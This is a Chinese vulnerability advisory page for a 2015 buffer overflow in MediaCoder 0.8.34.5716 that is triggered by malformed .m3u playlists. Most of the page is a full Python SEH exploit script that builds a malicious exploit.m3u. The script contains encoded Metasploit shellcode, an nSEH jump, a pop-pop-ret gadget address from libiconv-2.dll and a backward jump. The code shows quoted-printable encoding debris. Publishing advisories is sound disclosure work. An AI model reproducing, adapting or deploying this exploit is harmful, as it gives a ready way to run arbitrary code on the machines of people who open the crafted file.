当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

Mediacoder 0.8.34.5716版本缓冲区溢出漏洞

     发表日期:2015-05-08 10:11:09

Mediacoder 0.8.34.5716版本缓冲区溢出漏洞
发布日期:2015-05-06
更新日期:2015-05-07
受影响系统:
MediaCoder MediaCoder 0.8.34.5716
详细信息:
MediaCoder是一个免费的通用音频/视频批量转码工具。
 
 
 
MediaCoder在处理畸形.m3u文件时存在缓冲区溢出漏洞,攻击者利用此漏洞可执行未授权操作。
 
 
来源:
vendor
测试方法:
警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python
 
# Exploit Title: Mediacoder 0.8.34.5716 Buffer Overflow SEH Exploit (.m3u)
 
# Date: 05/May/2015
 
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
 
# email: kwiha2003 [at ]yahoo [dot] com=20
 
# Version: 0.8.34.5716
 
# Tested on: Win XP3
 
# Vendor: http://www.mediacoderhq.com/
 
# Software link: http://www.mediacoderhq.com/getfile.htm?site=3Dmediacoder.=
 
info&file=3DMediaCoder-0.8.34.5716.exe
 
 
 
# Greetz: b33f,corelan,offsec,vulnhub,HUST510
 
# Notes: Due to insifficient space after taking control of the EIP, you hav=
 
e to jump backwards and also=20
 
#        avoid a few bad bytes after the "A"s.
 
 
 
#!/usr/bin/python
 
buffersize =3D 853
 
buffer =3D ("http://" + "\\x41" * 256)
 
#Space for shellcode to decode
 
buffer +=3D "\\x90" * 24
 
# msfpayload windows/exec CMD=3Dcalc R|msfencode -b "\\x00\\x0a\\x0d\\x20" -t c=
 
 -e x86/shikata_ga_nai
 
#[*] x86/shikata_ga_nai succeeded with size 223 (iteration=3D1)
 
#unsigned char buf[] =3D=20
 
buffer +=3D("\\xdd\\xc1\\xbd\\xc4\\x15\\xfd\\x3a\\xd9\\x74\\x24\\xf4\\x5f\\x29\\xc9\\xb1"
 
"\\x32\\x31\\x6f\\x17\\x03\\x6f\\x17\\x83\\x2b\\xe9\\x1f\\xcf\\x4f\\xfa\\x69"
 
"\\x30\\xaf\\xfb\\x09\\xb8\\x4a\\xca\\x1b\\xde\\x1f\\x7f\\xac\\x94\\x4d\\x8c"
 
"\\x47\\xf8\\x65\\x07\\x25\\xd5\\x8a\\xa0\\x80\\x03\\xa5\\x31\\x25\\x8c\\x69"
 
"\\xf1\\x27\\x70\\x73\\x26\\x88\\x49\\xbc\\x3b\\xc9\\x8e\\xa0\\xb4\\x9b\\x47"
 
"\\xaf\\x67\\x0c\\xe3\\xed\\xbb\\x2d\\x23\\x7a\\x83\\x55\\x46\\xbc\\x70\\xec"
 
"\\x49\\xec\\x29\\x7b\\x01\\x14\\x41\\x23\\xb2\\x25\\x86\\x37\\x8e\\x6c\\xa3"
 
"\\x8c\\x64\\x6f\\x65\\xdd\\x85\\x5e\\x49\\xb2\\xbb\\x6f\\x44\\xca\\xfc\\x57"
 
"\\xb7\\xb9\\xf6\\xa4\\x4a\\xba\\xcc\\xd7\\x90\\x4f\\xd1\\x7f\\x52\\xf7\\x31"
 
"\\x7e\\xb7\\x6e\\xb1\\x8c\\x7c\\xe4\\x9d\\x90\\x83\\x29\\x96\\xac\\x08\\xcc"
 
"\\x79\\x25\\x4a\\xeb\\x5d\\x6e\\x08\\x92\\xc4\\xca\\xff\\xab\\x17\\xb2\\xa0"
 
"\\x09\\x53\\x50\\xb4\\x28\\x3e\\x3e\\x4b\\xb8\\x44\\x07\\x4b\\xc2\\x46\\x27"
 
"\\x24\\xf3\\xcd\\xa8\\x33\\x0c\\x04\\x8d\\xcc\\x46\\x05\\xa7\\x44\\x0f\\xdf"
 
"\\xfa\\x08\\xb0\\x35\\x38\\x35\\x33\\xbc\\xc0\\xc2\\x2b\\xb5\\xc5\\x8f\\xeb"
 
"\\x25\\xb7\\x80\\x99\\x49\\x64\\xa0\\x8b\\x29\\xeb\\x32\\x57\\xae")
 
buffer +=3D "\\x42" * 350
 
nseh =3D "\\xEB\\x06\\x90\\x90"
 
# 0x660104ee : pop edi # pop ebp # ret  | [libiconv-2.dll]=20
 
seh=3D"\\xee\\x04\\x01\\x66"
 
#Jump back 603 bytes due to insufficient space for shellcode
 
jmpbck =3D "\\xe9\\xA5\\xfd\\xff\\xff"
 
junk =3D ("D" * 55)=20
 
f=3D open("exploit.m3u",\'w\')
 
f.write(buffer + nseh + seh + jmpbck + junk)
 
f.close()
解决办法:
厂商补丁:
 
MediaCoder
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: